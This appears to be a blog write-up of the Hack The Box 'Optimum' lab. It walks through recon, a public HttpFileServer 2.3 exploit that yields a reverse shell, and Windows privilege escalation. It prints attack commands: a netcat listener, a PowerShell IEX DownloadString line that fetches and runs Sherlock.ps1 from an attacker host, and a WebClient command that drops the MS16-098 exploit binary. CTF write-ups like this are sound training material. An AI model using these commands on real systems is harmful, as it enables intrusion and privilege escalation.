Back again with another write up this time for Optimum from Hackthebox.
Difficulty level: Easy
As with all things I will start with a simple Nmap Scan
Nmap -sC -sV -sT -T4 -O nmap.txt 10.10.10.8
So not a ton of information is gathered here. But I do see a port 80 is open.
Let's head over to the site to see what we can find here.
So I inspected the page for awhile but didn't see anything too crazy here. Take note of the Server Information at the bottom HttpFileServer 2.3.
I am going to run Dirb to see if there are any hidden directories with this site.
This runs for quite awhile but nothing seems to catch. So lets move on.
There appears to be a login section on the website so I am going to try admin:admin
That was a fail. I tried some other variations too that didn't appear to work on the box and it kicked me off.
Let's turn to our trusted friend Google for some default creds maybe?
It looks like you have to register to the Server to get access so no luck again.
Lets take a deeper look into what this system is.
Basically its a File Server to send/receive files.
Heading back over to Google I am going to see if there are any exploits for this version and come across the following.
Take a closer look here, because this is how we will run the exploit.
So to put it simple, we need to run a HTTP Server from where our NC.exe is located (or make a copy in the same folder).
Copy this code either by using the copy button or highlighting it then paste it in your new file.
echo > exploit.py (since they named Exploit.py on their site want to keep the same convention)
Now paste in the code into the new .py file and edit the IP and Port number to yours.
chmod +x exploit.py
Now open a new terminal and do the following.
cp file/location .
Now we will start a python webserver.
python -m SimpleHTTPServer
Now set your Netcat listener to whatever port you have open. I also directed the IP here because it didn't work without it for some reason.
nc -nvlp 1234 10.10.10.8
In the window where your exploit is sitting run the following command.
python exploit.py 10.10.10.8 80
You may need to run this a few times to catch a shell.
But you should get the following!
There are a few file locations and I attempt to get access to Administrator but it looks like I don't have rights.
Let's see if we can grab the user file.
So it looks like we need to do a privesc on this box to get the root flag.
Run the following to get a full readout of the box.
Provides the OS name, Version, Manufac, Config as well as the got Fixies for the machine.
A hotfix or a quick-fix is a update to a bug or fault quickly.
I started with Windows-exploit-suggestor.py but I couldn't get it to run. There seems to be some issues with py2 and migrating over to py3.
If you get this working with a workaround please ping me on twitter and tell me how you fixed it.
Another tool for looking for privesc is Sherlock.
Now put the following command at the bottom of the script.
Now we need to get this script onto our victim machine. Lets open back up the Python webserver to push it over.
python -m SimpleHTTPServer 80
I cheated a little by checking out this quick Powershell cheatsheet on how to move this file over.
powershell "IEX (New-Object Net.WebClient).DownloadString('http://X.X.X.X:80/Sherlock.ps1')"
Now this should run to show a few potential MS's that we can use.
From the list I am going to give MS16-032 a try and do a quick searchsploit to see if its there.
Going to try the 39719.ps1 one.
When put in the next powershell script make sure to direct it to a actual file.
I tried to run this a few times but it didn't work.
So I am going to head back over to Google for another way in. I came across MS16-098 that I would like to try.
Let's grab this .exe file.
chmod +x 41020.exe
python -m SimpleHTTPServer 80
Run the following code in your victim machine.
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.X.X:80/41020.exe', 'c:\Users\Public\Downloads\41020.exe')"
And just like that you have now gained root level access!